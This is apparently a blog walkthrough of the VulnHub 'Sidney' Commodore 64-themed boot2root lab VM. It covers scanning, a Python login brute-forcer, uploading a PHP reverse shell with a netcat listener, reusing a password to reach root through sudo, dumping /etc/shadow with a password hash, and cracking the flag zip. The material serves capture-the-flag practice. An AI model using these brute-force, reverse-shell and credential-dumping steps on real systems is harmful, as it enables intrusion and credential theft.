Description:
Welcome to my third boot2root / CTF this one is called Sidney. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag, and being me, it's never where they normally live... B-)If you are having trouble with the NIC, make sure the adapter is set to use the MAC 00:0C:29:50:14:56
Some hints for you:
- If you are hitting a wall, read https://de.wikipedia.org/wiki/MOS_Technology_6502
- The flag is audio as well as visual
Many thanks to Rasta_Mouse and GKNSB for testing this CTF.
Special thanks and shout-outs go to GKNSB and Rasta_Mouse, hopefully he streams this one live too! Also a shout-out to g0tmi1k for #vulnhub and offering to host my third CTF.
Here We Go:
1. Host Discovery
2. Service Enumeration
Host Discovery:
Discovery of the IP: netdiscover -r 192.168.234.0/24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 | |
| _____________________________________________________________________________ | |
| IP At MAC Address Count Len MAC Vendor / Hostname | |
| ----------------------------------------------------------------------------- | |
| 192.168.234.1 00:50:56:c0:00:01 1 60 VMware, Inc. | |
| 192.168.234.167 00:0c:29:5d:88:b2 1 60 VMware, Inc. | |
| 192.168.234.254 00:50:56:e1:ab:9c 1 60 VMware, Inc. |
Our target is 192.168.234.167
Service Enumeration:
Now that we have our target (192.168.234.167) we can use nmap to discover any running services.
NOTE: nmap could have also been used to discover the host also, but i like using netdiscover purely to speed up the process
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:~# nmap -sS -Pn -p1-65535 192.168.234.167 | |
| Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-06 14:14 EDT | |
| mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers | |
| Nmap scan report for 192.168.234.167 | |
| Host is up (0.000068s latency). | |
| Not shown: 65534 closed ports | |
| PORT STATE SERVICE | |
| 80/tcp open http | |
| MAC Address: 00:0C:29:5D:88:B2 (VMware) | |
| Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds |
Nikto to the rescue:
Using nikto.... nikto -host 192.168.234.167
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:~# nikto -host 192.168.234.167 | |
| - Nikto v2.1.6 | |
| --------------------------------------------------------------------------- | |
| + Target IP: 192.168.234.167 | |
| + Target Hostname: 192.168.234.167 | |
| + Target Port: 80 | |
| + Start Time: 2016-06-06 14:22:04 (GMT-4) | |
| --------------------------------------------------------------------------- | |
| + Server: Apache/2.4.18 (Ubuntu) | |
| + Server leaks inodes via ETags, header found with file /, fields: 0x116 0x5339ba83ee199 | |
| + The anti-clickjacking X-Frame-Options header is not present. | |
| + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS | |
| + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type | |
| + No CGI Directories found (use '-C all' to force check all possible dirs) | |
| + Uncommon header 'tcn' found, with contents: list | |
| + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html | |
| + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST | |
| + OSVDB-3233: /icons/README: Apache default file found. | |
| + 7535 requests: 0 error(s) and 8 item(s) reported on remote host | |
| + End Time: 2016-06-06 14:22:13 (GMT-4) (9 seconds) |
Personally i always run a dirb with the defaults. When needed i will run a dirbuster with the /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt
After running dirb -host 192.168.234.167
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ----------------- | |
| DIRB v2.22 | |
| By The Dark Raver | |
| ----------------- | |
| START_TIME: Mon Jun 6 14:27:52 2016 | |
| URL_BASE: http://192.168.234.167/ | |
| WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt | |
| ---- Scanning URL: http://192.168.234.167/ ---- | |
| + http://192.168.234.167/index (CODE:200|SIZE:278) | |
| + http://192.168.234.167/index.html (CODE:200|SIZE:278) | |
| + http://192.168.234.167/server-status (CODE:403|SIZE:303) | |
| ----------------- | |
| END_TIME: Mon Jun 6 14:27:54 2016 | |
| DOWNLOADED: 4612 - FOUND: 3 |
 |
Viewing the source we are presented with the following:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <TITLE>38911 Bytes Free</TITLE> | |
| <BODY> | |
| So.... Back for more are you....? Give Ben Daglish a call. I'm sure | |
| he's know the login B-) | |
| <br></br> | |
| <B>Commodore 64 Still ready</B> | |
| <br></br> | |
| <img src="commodore64/c64_1280x1024.jpg" alt="commodore64" height="1024" width="1280"> | |
| </BODY> |
Nope...no directory browsing. but we are greeted by a Commodore64 gif and a message... the source tells us...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <title>Shoo!</title> | |
| <!-- added by robhubbard password is the C=64 sound chip lowercase --> | |
| <!-- 3letters4digits no space... Instead, show user a proper micro --> | |
| <BODY> | |
| Will you go away, I'm trying to press play on tape and you bother me kid! | |
| <br></br> | |
| <img src="200.gif" alt="commodore64" height="408" width="544"> | |
| </BODY> |
We have a second name: "robhubbard" and a clue as to the password:
"password is the C=64 sound chip lowercase...3letters4digits no space..."
geez....might as well just write the password....or so i thought... So i went off and used wikipedia (based on the search results for "c=64 sound chip")...long story short i found chips with the prefix of sid and mod...
Which is great and all... but where the hell is a login screen? Before i use dirbuster on the commodore64 folder i decide to try and figure out what im dealing with... attempting index.php displays...
A login screen...wtf were we looking at before...using just index without a suffix returns us to the commodore64 gif...hmm...
Anyhow, PHPFM...the hell is that... after a quick search we can see that PHPFM is a php based filemanager (uploading a php revshell is looking pretty promising).
Using sqlmap -u "http://192.168.234.167/commodore64/index.php" --forms: yielded no results. damn...
Ok so what we know already from discovery is that Ben Daglish knows the login. and an assumed user "robhubbard" who seems very willing to give up a password.
Time to make a brute forcer using python:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| lastLen = '0' | |
| url = 'http://192.168.234.167/commodore64/index.php' | |
| user = 'robhubbard' | |
| for i in xrange(0,9999): | |
| passwd = 'mos{}'.format(i) | |
| resp = requests.post(url,files={'input_username': (None, user),'input_password':(None, passwd),'path': (None,'')}) | |
| if lastLen != len(resp.text): | |
| print len(resp.text) | |
| print "Using {} resulted in a different page size" | |
| lastLen = len(resp.text) |
Running python Bruter.py:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1841 | |
| Using mos3935 resulted in a different page size | |
| 18438 | |
| Using mos6518 resulted in a different page size | |
| 1841 | |
| Using mos6519 resulted in a different page size | |
| 1840 |
NOTE: Using the bruteforcer too much had caused the Sidney VM (atleast on my machine) to have some funky errors. (Session was not stored properly upon logging on and i had to reset the VM to get it to function correctly again)
Judging by the output the length of the page increased from 1840/1841 to 18438 think we got a hit on:
username: robhubbard
password: mos6518
Trying robhubbard/mos6518 we are authenticated into the PHPFM site.
Time to use a PHP Reverse shell that i found from pentestmonkey.net
The reverse shell uploaded without an issue... i figured the site would have fought me alittle more but, hey, thats probably why ive never heard of PHPFM lol..
Anyhow, firing up a netcat listener on port 666( nc -lvp 666) and visiting the revshell.php that i uploaded i get a reverse shell. w00t!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| connect to [192.168.234.2] from (UNKNOWN) [192.168.234.167] 43464 | |
| Linux sidney 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux | |
| uid=33(www-data) gid=33(www-data) groups=33(www-data) | |
| www-data | |
| root:x:0:0:root:/root:/bin/bash | |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
| bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
| sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
| sync:x:4:65534:sync:/bin:/bin/sync | |
| games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
| man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
| lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
| mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
| news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
| uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
| proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
| www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
| backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
| list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
| irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin | |
| gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | |
| nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
| systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false | |
| systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false | |
| systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false | |
| systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false | |
| syslog:x:104:108::/home/syslog:/bin/false | |
| _apt:x:105:65534::/nonexistent:/bin/false | |
| lxd:x:106:65534::/var/lib/lxd/:/bin/false | |
| mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false | |
| messagebus:x:108:112::/var/run/dbus:/bin/false | |
| uuidd:x:109:113::/run/uuidd:/bin/false | |
| dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false | |
| rhubbard:x:1000:1000:Rob Hubbard,,,:/home/rhubbard:/bin/bash | |
| /bin/sh: 0: can't access tty; job control turned off | |
| $ |
NOTE: I have modified the payload to be executed slightly to make it display the id/whoami/cat etc/passwd upon connection
The output from the cat /etc/passwd shows us that the 2 users of the system are root and rhubbard .... Wait.... as in robhubbard? Wonder if the doofus is using the same password. Before we can attempt a su (attempting a su robhubbard at this stage gives us a "su: must be run from a terminal" error), we must get a different shell easy enough. We will use a jailbreak trick found on g0tmi1k's blog python -c "import pty;pty.spawn('/bin/bash');"
Using python -c "import pty;pty.spawn('/bin/bash');" results in a "/bin/sh: 2: python: not found" error...python is missing.. hrmmm... I decide to go looking to see whats up with python.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ find / -name python* 2>/dev/null | |
| ... | |
| /usr/bin/python3.5m | |
| /usr/bin/python3.5 | |
| /usr/bin/python3 | |
| /usr/bin/python3m |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python3.5 -c "import pty;pty.spawn('/bin/bash');" | |
| www-data@sidney:/$ _ |
Ok... now lets see if numbnuts uses the same password. using "su rhubbard" and "mos6518" as the password we successfully switch users to rhubbard...
Can we get lucky with sudo? sudo -l results in the following:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rhubbard@sidney:/$ sudo -l | |
| sudo -l | |
| [sudo] password for rhubbard: mos6518 | |
| Matching Defaults entries for rhubbard on sidney.example.com: | |
| env_reset, mail_badpass, | |
| secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin | |
| User rhubbard may run the following commands on sidney.example.com: | |
| (ALL : ALL) ALL | |
| rhubbard@sidney:/$ |
rhubbard has the permissions to run any and everything as root. Lets get our root permissions using sudo su
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@sidney:/# id;cat /etc/shadow | |
| id;cat /etc/shadow | |
| uid=0(root) gid=0(root) groups=0(root) | |
| root:!:16944:0:99999:7::: | |
| daemon:*:16911:0:99999:7::: | |
| bin:*:16911:0:99999:7::: | |
| sys:*:16911:0:99999:7::: | |
| sync:*:16911:0:99999:7::: | |
| games:*:16911:0:99999:7::: | |
| man:*:16911:0:99999:7::: | |
| lp:*:16911:0:99999:7::: | |
| mail:*:16911:0:99999:7::: | |
| news:*:16911:0:99999:7::: | |
| uucp:*:16911:0:99999:7::: | |
| proxy:*:16911:0:99999:7::: | |
| www-data:*:16911:0:99999:7::: | |
| backup:*:16911:0:99999:7::: | |
| list:*:16911:0:99999:7::: | |
| irc:*:16911:0:99999:7::: | |
| gnats:*:16911:0:99999:7::: | |
| nobody:*:16911:0:99999:7::: | |
| systemd-timesync:*:16911:0:99999:7::: | |
| systemd-network:*:16911:0:99999:7::: | |
| systemd-resolve:*:16911:0:99999:7::: | |
| systemd-bus-proxy:*:16911:0:99999:7::: | |
| syslog:*:16911:0:99999:7::: | |
| _apt:*:16911:0:99999:7::: | |
| lxd:*:16944:0:99999:7::: | |
| mysql:!:16944:0:99999:7::: | |
| messagebus:*:16944:0:99999:7::: | |
| uuidd:*:16944:0:99999:7::: | |
| dnsmasq:*:16944:0:99999:7::: | |
| rhubbard:$6$YWG61JCB$EPy1p59NOkASVPJAVXN20wSjtJdDVLeNue3eE5Tl0ANtBqJPqXLyOIh73NXhb8IIfqHYB9t48Q2MVw/Vs6VN90:16944:0:99999:7::: | |
| root@sidney:/# |
Lets get our flag.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@sidney:~# ls -lah | |
| ls -lah | |
| total 88K | |
| drwx------ 3 root root 4.0K Jun 6 16:24 . | |
| drwxr-xr-x 23 root root 4.0K May 31 20:39 .. | |
| -rw------- 1 root root 584 Jun 6 16:24 .bash_history | |
| -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc | |
| dr-------- 3 root root 4.0K May 24 21:02 .commodore64 | |
| -rw-rw-r-- 1 rhubbard rhubbard 61K May 24 21:27 hint.gif | |
| -rw-r--r-- 1 root root 148 Aug 17 2015 .profile |
As you can see we are presented with a hint.gif and a hidden folder called .commedore64. I will skip the hint for now and traverse the .commodore64 path.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@sidney:~/.commodore64# ls -lah | |
| ls -lah | |
| total 12K | |
| dr-------- 3 root root 4.0K May 24 21:02 . | |
| drwx------ 3 root root 4.0K Jun 6 16:24 .. | |
| dr-------- 3 root root 4.0K May 24 21:01 .miami | |
| root@sidney:~/.commodore64# cd .miami | |
| cd .miami | |
| root@sidney:~/.commodore64/.miami# ls | |
| ls | |
| vice | |
| root@sidney:~/.commodore64/.miami# ls -lah | |
| ls -lah | |
| total 12K | |
| dr-------- 3 root root 4.0K May 24 21:01 . | |
| dr-------- 3 root root 4.0K May 24 21:02 .. | |
| dr-------- 2 root root 4.0K May 25 18:40 vice | |
| root@sidney:~/.commodore64/.miami# cd vice | |
| cd vice | |
| root@sidney:~/.commodore64/.miami/vice# ls -lah | |
| ls -lah | |
| total 12K | |
| dr-------- 2 root root 4.0K May 25 18:40 . | |
| dr-------- 3 root root 4.0K May 24 21:01 .. | |
| -r-------- 1 rhubbard rhubbard 4.0K May 24 20:59 flag.zip | |
| -r-------- 1 root root 0 May 24 21:02 versatile_commodore_emulator | |
| root@sidney:~/.commodore64/.miami/vice# |
using CP i was able to copy the flag.zip to /var/www/html and get the zip file on my local. Of course it is password protected so using fcrackzip we get the following output
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:~/Downloads# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -uv flag.zip | |
| found file 'flag.d64', (size cp/uc 3923/174848, flags 9, chk 9be5) | |
| checking pw budayday | |
| PASSWORD FOUND!!!!: pw == 38911 |
Sweet so we have a flag.d64 now which can be run with an emulator.
NOTE: I am lazy ATM so i will not attempt to get the emulator working. but doing a strings on the file tells me everything i need to know.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| `````````````````````````````````````` | |
| `````````````````````````````````` | |
| }CONGRATULATIONS! } | |
| } | |
| `````````````````````````````````` | |
| `````````````````````````````````````` | |
| TI | |
| (60 | |
| 0: G | |
| TI | |
| +r.81&4B7 | |
| \pbLh | |
| %%%%%%%%%%%%%%%%%%%%%%%%)## | |
| %%%%%%%%#)# | |
| } | |
| }WELL DONE ONCE MORE ON GETTING THE} | |
| }FLAG --VULNHUB'S FIRST C=64 ONE-- } | |
| }WHICH I HOPE YOU ENJOYED. } | |
| } } | |
| }SHOUT-OUTS TO #VULNHUB & A S | |
| } } | |
| } } | |
| }iuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiu} | |
| }jkjkjkjkjkjkjkjkjkjkjkjkjkjkjkjkjk} | |
| } } | |
| PSID | |
| Warhawk | |
| Rob Hubbard | |
| 1986 Firebird | |
| H)xJJJ | |
| JJJJ | |
| OP0 | |
| *,=GQ[oz | |
| %%%%%%%%%%%%%%%%##) | |
| %%%%%% | |
| &&&&&& | |
| '''''' | |
| ,,,,, | |
| ----- | |
| ..... | |
| 7?C?O | |
| PECIAL} | |
| }THANKS GOES TO GKNSB & RASTA | |
| MOUSE} | |
| }FOR TESTING & G0TMI1K FOR HOSTING.} | |
| } } | |
| }COMMODORE 64 - STILL READY } | |
| } --KNIGHTMA | |
| VULNHUB | |
| 01 2A | |
| FLAG | |
| WARHAWK.SID | |
| qqqqqqqqqqqqqqqq | |
| q q | |
| qqqqqqqqqqqqqqqq |
Awesome VM from @knightmare2600 and a special thanks to VulnHub for hosting it.
No comments:
Post a Comment